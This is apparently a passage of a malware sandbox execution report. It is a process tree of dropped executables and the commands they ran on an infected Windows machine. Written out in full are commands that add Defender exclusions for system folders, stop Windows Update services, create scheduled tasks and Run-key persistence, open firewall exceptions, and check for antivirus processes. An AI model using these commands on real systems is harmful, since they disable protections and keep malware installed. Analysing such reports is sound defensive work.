C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"16⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2896 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:3364
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1rPwmYAqGxXj.bat" "17⤵PID:3424
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:2488
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3964
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"18⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3116 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:3532
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\HsBVlqJxJmmb.bat" "19⤵PID:2332
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:3244
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3548
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"20⤵
- Suspicious use of SetWindowsHookEx
PID:5648 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:904
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\9p4A6R13FBvM.bat" "21⤵PID:5248
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1848
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"22⤵
- Suspicious use of SetWindowsHookEx
PID:5372 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:4436
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\2dQap6RBdtP9.bat" "23⤵PID:1984
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:4468
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4484
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"24⤵
- Suspicious use of SetWindowsHookEx
PID:6272 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:5668
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\6WYamtX1Jzt8.bat" "25⤵PID:5936
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:6060
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3812
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"26⤵
- Suspicious use of SetWindowsHookEx
PID:6000 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:6108
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2628
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:348
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1660
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
PID:1500
-
-
-
C:\Users\Admin\AppData\Local\Temp\1754010522.exeC:\Users\Admin\AppData\Local\Temp\1754010522.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\820810029.exeC:\Users\Admin\AppData\Local\Temp\820810029.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\ProgramData\F3B2.tmp"C:\ProgramData\F3B2.tmp"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3328 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\F3B2.tmp >> NUL8⤵PID:3412
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 8366⤵
- Loads dropped DLL
- Program crash
PID:3112
-
-
-
C:\Users\Admin\AppData\Local\Temp\2572212193.exeC:\Users\Admin\AppData\Local\Temp\2572212193.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:2480
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1604
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:2620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\259973368.exeC:\Users\Admin\AppData\Local\Temp\259973368.exe5⤵
- Executes dropped EXE
PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\2924327870.exeC:\Users\Admin\AppData\Local\Temp\2924327870.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:696 -
C:\Users\Admin\AppData\Local\Temp\1229421168.exeC:\Users\Admin\AppData\Local\Temp\1229421168.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3376
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3.exe"C:\Users\Admin\AppData\Local\Temp\Files\3.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:2652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:2664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵PID:2600
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2168
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:556
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2860
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
PID:2916
-
-
-
C:\Users\Admin\AppData\Local\Temp\2362724532.exeC:\Users\Admin\AppData\Local\Temp\2362724532.exe5⤵
- Executes dropped EXE
PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\1334316928.exeC:\Users\Admin\AppData\Local\Temp\1334316928.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:2872
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1356
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:2880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\136198103.exeC:\Users\Admin\AppData\Local\Temp\136198103.exe5⤵
- Executes dropped EXE
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\1960333372.exeC:\Users\Admin\AppData\Local\Temp\1960333372.exe5⤵
- Executes dropped EXE
PID:2860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\unison.exe"C:\Users\Admin\AppData\Local\Temp\Files\unison.exe"3⤵
- Executes dropped EXE
PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\Files\6.exe"C:\Users\Admin\AppData\Local\Temp\Files\6.exe"3⤵
- Executes dropped EXE
PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"3⤵
- Executes dropped EXE
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe"C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:872 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2136 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 65⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3248
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3996
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- Suspicious use of SetThreadContext
PID:3204 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
-
C:\Users\Admin\AppData\Local\Temp\neon.exe"C:\Users\Admin\AppData\Local\Temp\neon.exe"4⤵
- System Location Discovery: System Language Discovery
PID:820 -
C:\Users\Admin\AppData\Local\Temp\neon.exe"C:\Users\Admin\AppData\Local\Temp\neon.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5464 -
C:\Users\Admin\AppData\Local\Temp\neon.exe"C:\Users\Admin\AppData\Local\Temp\neon.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\neon.exe"C:\Users\Admin\AppData\Local\Temp\neon.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6016
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:7000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe"C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Technique Technique.cmd & Technique.cmd & exit4⤵
- System Location Discovery: System Language Discovery
PID:1564 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3244
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:3788
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1464
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 795565⤵
- System Location Discovery: System Language Discovery
PID:3912
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "SpecificationsRemainExtraIntellectual" Compile5⤵
- System Location Discovery: System Language Discovery
PID:996
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Cruz + Occupations + Grab + Recovery 79556\J5⤵
- System Location Discovery: System Language Discovery
PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pifBoxing.pif J5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:3908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe"C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:984 -
C:\Users\Admin\AppData\Roaming\SteamDetector.exe"C:\Users\Admin\AppData\Roaming\SteamDetector.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious behavior: GetForegroundWindowSpam
PID:1456 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3536
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 5485⤵
- System Location Discovery: System Language Discovery
PID:6948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"3⤵
- Executes dropped EXE
PID:3160
-
-
C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"3⤵
- Executes dropped EXE
PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"3⤵
- Executes dropped EXE
PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"3⤵
- Executes dropped EXE
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"4⤵
- Executes dropped EXE
PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\r.exe"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2136 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"3⤵PID:3728
-
C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"4⤵PID:6040
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4788 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5412
-
C:\Users\Admin\AppData\Roaming\kcS1bmnZOz.exe"C:\Users\Admin\AppData\Roaming\kcS1bmnZOz.exe"5⤵PID:2680
-
-
C:\Users\Admin\AppData\Roaming\XXzcdjThSk.exe"C:\Users\Admin\AppData\Roaming\XXzcdjThSk.exe"5⤵PID:6408
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 524⤵
- Program crash
PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"3⤵PID:4112
-
-
C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"3⤵PID:3704
-
-
C:\Users\Admin\AppData\Local\Temp\Files\a.exe"C:\Users\Admin\AppData\Local\Temp\Files\a.exe"3⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4764 -
C:\Users\Admin\sysvplervcs.exeC:\Users\Admin\sysvplervcs.exe4⤵PID:3608
-
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" shell32.dll,Options_RunDLL 72⤵PID:2876
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:2340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1208 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef3cd9758,0x7fef3cd9768,0x7fef3cd97783⤵PID:1228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:23⤵PID:2972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:83⤵PID:1564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:83⤵PID:2212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:13⤵PID:236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:13⤵PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1364 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:23⤵PID:1628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1356 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:13⤵PID:2524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:83⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level3⤵PID:2912
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1400d7688,0x1400d7698,0x1400d76a84⤵PID:2580
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3712 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:13⤵PID:1256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:83⤵PID:3032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:83⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"5⤵
- Executes dropped EXE
PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3384 -
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe6⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\1436610214.exeC:\Users\Admin\AppData\Local\Temp\1436610214.exe7⤵
- Executes dropped EXE
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\12382869.exeC:\Users\Admin\AppData\Local\Temp\12382869.exe7⤵
- Executes dropped EXE
PID:2676 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:3172
-
